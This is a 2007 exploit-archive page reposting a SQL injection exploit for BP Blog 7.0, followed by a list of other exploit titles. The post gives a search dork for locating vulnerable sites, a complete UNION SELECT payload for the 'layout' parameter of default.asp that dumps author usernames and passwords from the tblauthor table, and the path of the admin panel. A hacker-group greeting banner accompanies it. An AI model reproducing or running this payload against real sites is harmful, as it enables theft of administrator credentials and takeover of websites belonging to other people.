exploits , vulnerabilities , articles , BP Blog 7.0 (default.asp layout) Remote SQL Injection Vulnerability

2007-03-12

BP Blog 7.0 (default.asp layout) Remote SQL Injection Vulnerability

Rated as : High Risk

#####################################
# BeyazKurt <B3yazKurt@Hotmail.Com>
# Script : BP Blog
# D0rk   : "Powered by BP Blog 7.0"
# thnx   : Forever.slam and all WorldHackerz Team!
#
# WorldHackerz Mirr0r'da Taht Bizimdir (h) :=)
#####################################
-------
Exploit :
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Admin Panel : admin_default.asp
securitydot.net - 2007-03-12

Exploits - newest 10 RSS | More

2007-06-15 56629 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33721 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41876 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28955 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19474 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16468 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19127 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16332 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33243 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16991 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit